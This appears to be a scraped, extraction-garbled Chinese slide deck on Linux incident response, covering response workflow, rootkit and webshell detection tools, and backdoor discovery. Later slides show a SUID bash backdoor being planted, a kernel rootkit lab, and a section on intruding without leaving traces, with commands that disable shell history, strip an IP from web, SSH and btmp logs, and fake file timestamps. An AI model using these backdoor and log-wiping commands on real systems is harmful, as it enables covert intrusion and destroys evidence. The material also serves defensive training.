版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
信息安全信息安全應(yīng)急手冊(cè)介紹內(nèi)容介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡1.應(yīng)急響應(yīng)流程1.應(yīng)急響應(yīng)流程PAGEPAGE3安全事件應(yīng)急流程圖3.安全事件3.安全事件分析安全事件發(fā)現(xiàn)安 準(zhǔn)備全運(yùn)維層
4.安全事件4.安全事件分類分級(jí)是
是否需要第8.安全事件總結(jié)8.安全事件恢復(fù)7.安全事件抑8.安全事件總結(jié)8.安全事件恢復(fù)7.安全事件抑制調(diào)5.事件上報(bào)
9.應(yīng)急預(yù)案更新是安全管 事件決策理 指導(dǎo)層6.協(xié)調(diào)處置安全事件6.協(xié)調(diào)處置安全事件安全事件
遠(yuǎn)程應(yīng)急響應(yīng)第三方組織(急人員)
了解安全事件情況(電話、郵件)
否確認(rèn)是否去現(xiàn)場(chǎng)是去現(xiàn)場(chǎng)應(yīng)急響應(yīng)安全事件線索常被篡改……
應(yīng)急分析ip找到攻擊途徑攻擊源ip些啥?加固建議
應(yīng)急報(bào)告介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡2.應(yīng)急重要點(diǎn)排查—linux目錄結(jié)構(gòu)2.應(yīng)急重要點(diǎn)排查—linux目錄結(jié)構(gòu)PAGEPAGE72.應(yīng)急重要點(diǎn)排查—linux常用進(jìn)程服務(wù)介紹2.應(yīng)急重要點(diǎn)排查—linux常用進(jìn)程服務(wù)介紹PAGEPAGE82.應(yīng)急重要點(diǎn)排查—linux應(yīng)急檢查點(diǎn)2.應(yīng)急重要點(diǎn)排查—linux應(yīng)急檢查點(diǎn)PAGEPAGE92.應(yīng)急重要點(diǎn)排查—linux常用應(yīng)急命令2.應(yīng)急重要點(diǎn)排查—linux常用應(yīng)急命令PAGEPAGE10介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡3.應(yīng)急重要點(diǎn)排查—rootkit檢查工具介紹3.應(yīng)急重要點(diǎn)排查—rootkit檢查工具介紹PAGEPAGE12內(nèi)核級(jí)后門檢查chkrootkit的使用project:#tar-zxvf#makesense#./chkrootkit發(fā)現(xiàn)內(nèi)核級(jí)后門以及netstat命令已被篡改2.應(yīng)急重要點(diǎn)排查—rootkit檢查工具介紹2.應(yīng)急重要點(diǎn)排查—rootkit檢查工具介紹PAGEPAGE13內(nèi)核級(jí)后門檢查rkhunter的使用rootkithunter的使用Project:\hhttp://www.rootkit.nl/projects/rootkit_hunter.htmldownload:\h/rkhunter/rkhunter-1.3.4.tar.gz?use_mirror=jaist#tar-zxvfrkhunter-1.3.4.tar.gz#cdrkhunter-1.3.4#./installer.sh–h#./rkhunter-c發(fā)現(xiàn)內(nèi)核級(jí)后門3.應(yīng)急重要點(diǎn)排查—webshell檢查工具介紹3.應(yīng)急重要點(diǎn)排查—webshell檢查工具介紹PAGEPAGE14webshell后門檢查工具shelldete的使用Project:/emposha/PHP-Shell-Detector/zipball/masterdownload:/emposha/PHP-Shell-Detector/archive/master.zip#pythonshelldetect.py-dE:\測(cè)試工具\(yùn)webshell發(fā)現(xiàn)webshellwscan檢查工具的使用,選擇路徑即可進(jìn)行掃描webshellscanner檢查工具的使用,選擇文件類型選擇路徑即可進(jìn)行掃描對(duì)于是linux里的網(wǎng)站可以先把動(dòng)態(tài)腳本打包回來(lái),然后再用windowswebshell檢查工具檢查即可。#find/webroot-typef-name*.jsp|xargstarzcvfweb.tar.gz2.應(yīng)急重要點(diǎn)排查—異常日志檢查工具介紹2.應(yīng)急重要點(diǎn)排查—異常日志檢查工具介紹1717Web日志安全分析檢查工具的使用,選擇日志類型選擇路徑即可進(jìn)行掃描介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡5.安裝rootkit后門和發(fā)現(xiàn)后門5.安裝rootkit后門和發(fā)現(xiàn)后門PAGEPAGE19實(shí)驗(yàn)環(huán)境:Centos5.4后門工具:ddrk.tgzRootkit)是一個(gè)Linux結(jié)合shv和adore-ng優(yōu)點(diǎn)的,內(nèi)核級(jí)rootkit。已成功植入rookit無(wú)端口無(wú)進(jìn)程,現(xiàn)在我用一個(gè)干凈的netstat去執(zhí)行看看,./ps和直接執(zhí)行ps結(jié)果不一樣,ps也被替換。/setupport登陸后門成功拷貝一個(gè)干凈的netstat過(guò)來(lái)可以發(fā)現(xiàn)2013端口使用chkrootkit和rkhunter工具均可以發(fā)現(xiàn)后門PAGEPAGE5.安裝s權(quán)限位后門和發(fā)現(xiàn)s權(quán)限位后門PAGE22PAGE22[root@localhost~]#cp/bin/bash/tmp/.wp[root@localhost~]#chmod4755/tmp/.wp[root@localhost~]#suhacker[hacker@localhostroot]$/tmp/.wp-p檢查s權(quán)限位后門(需要root權(quán)限檢查)find/-typef-perm-04000PAGEPAGE6.安裝s權(quán)限位后門和發(fā)現(xiàn)s權(quán)限位后門PAGE23PAGE23[root@localhost~]#cp/bin/bash/tmp/.wp[root@localhost~]#chmod4755/tmp/.wp[root@localhost~]#suhacker[hacker@localhostroot]$/tmp/.wp-p檢查s權(quán)限位后門(需要root權(quán)限檢查)find/-typef-perm-04000介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡6.如何入侵不留痕跡6.如何入侵不留痕跡PAGEPAGE25linux日志追蹤與清除/var/log/secure:登錄ssh登陸或者失敗的日志記錄/var/log/wtmp:記錄登錄者訊錄,二進(jìn)制文件,須用last來(lái)讀取內(nèi)容/var/log/btmp;記錄登錄失敗的ip/root/.bash_histroy 記錄輸入過(guò)的命令/var/www/log/access_log apache記錄日志exportHISTFILE=/dev/null;exportHISTSIZE=0;exportHISTFILESIZE=0刪除你的websed-i/520.520.520.520/daccess_log*3.替換你的登錄ssh的日志:sed-i's/520.520.520.520//g'secure.14.刪除last日志記錄的日志:btmp為二進(jìn)制文件需要strings導(dǎo)出。stringsbtmp>btmp.1sed-i's/520.520.520.520/d'btmp.1touch-r舊btmp新btmp.1偽造新創(chuàng)建btmp.1的時(shí)間為之前的時(shí)間rm-rf舊btmpmvbtmp.1btmp6.如何入侵不留痕跡—清除日志6.如何入侵不留痕跡—清除日志PAGEPAGE26linux日志追蹤與清除/var/log/secure:登錄ssh登陸或者失敗的日志記錄/var/log/wtmp:記錄登錄者訊錄,二進(jìn)制文件,須用last來(lái)讀取內(nèi)容/var/log/btmp;記錄登錄失敗的ip/root/.bash_histroy 記錄輸入過(guò)的命令/var/www/log/access_log apache記錄日志1.exportHISTFILE=/dev/null;exportHISTSIZE=0;exportHISTFILESIZE=02.刪除你的web訪問(wèn)日志:sed-i'/520.520.520.520/d'access_log*3.替換你的登錄ssh的日志:sed-i's/520.520.520.520//g'secure.14.刪除last日志記錄的日志:btmp為二進(jìn)制文件需要strings導(dǎo)出。stringsbtmp>btmp.1sed-i's/520.520.520.520/d'btmp.1touch-r舊btmp新btmp.1偽造新創(chuàng)建btmp.1的時(shí)間為之前的時(shí)間rm-rf舊btmpmvbtmp.1btmp6.如何入侵不留痕跡—不記錄history日志6.如何入侵不留痕跡—不記錄history日志PAGEPAGE27讓系統(tǒng)不記錄你的history記錄:#替換你的登錄ssh的日志:sed-i's/520.520.520.520//g'secure.16.如何入侵不留痕跡—不記錄history日志6.如何入侵不留痕跡—不記錄history日志8822讓系統(tǒng)不記錄你的ssh登陸ip記錄:#exportHISTFILE=/dev/null;exportHISTSIZE=0;exportHISTFILESIZE=06.如何入侵不留痕跡—不記錄
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 西藥批發(fā)企業(yè)運(yùn)營(yíng)效率提升考核試卷
- 針織服裝設(shè)計(jì)師職業(yè)素養(yǎng)與技能要求考核試卷
- 電氣設(shè)備電力系統(tǒng)故障分析與處理考核試卷
- 聲學(xué)器件的音色再現(xiàn)與演奏效果考核試卷
- 計(jì)算機(jī)視覺(jué)與機(jī)器學(xué)習(xí)設(shè)計(jì)考核試卷
- D打印技術(shù)在建筑結(jié)構(gòu)抗風(fēng)性能提升的應(yīng)用考核試卷
- 汽車金融公司金融產(chǎn)品多樣化策略與實(shí)踐考核試卷
- 兒童心理創(chuàng)傷干預(yù)與康復(fù)考核試卷
- 出版業(yè)市場(chǎng)營(yíng)銷策略考核試卷
- D打印技術(shù)在工業(yè)產(chǎn)品生產(chǎn)成本控制的應(yīng)用考核試卷
- 07FG01~05防空地下室結(jié)構(gòu)設(shè)計(jì)(2007年合訂本)
- 2024年春期末測(cè)試四年級(jí)語(yǔ)文試卷質(zhì)量分析
- 蘇科版(2024)七年級(jí)上冊(cè)數(shù)學(xué)第3章 代數(shù)式3.1字母表示數(shù) 教案
- 山東省青島市西海岸新區(qū)2023-2024學(xué)年三年級(jí)上學(xué)期期中數(shù)學(xué)試題
- 法院教育培訓(xùn)計(jì)劃方案(3篇模板)
- 透析中低血壓的預(yù)防
- 完整版2024年“安全生產(chǎn)月”全文課件
- 醫(yī)院感染控制設(shè)施設(shè)備配置指南
- 2024年保安員考試題含答案【黃金題型】
- 中醫(yī)康復(fù)技術(shù)技術(shù)規(guī)范標(biāo)準(zhǔn)
- 小學(xué)教育教學(xué)考評(píng)方案及細(xì)則
評(píng)論
0/150
提交評(píng)論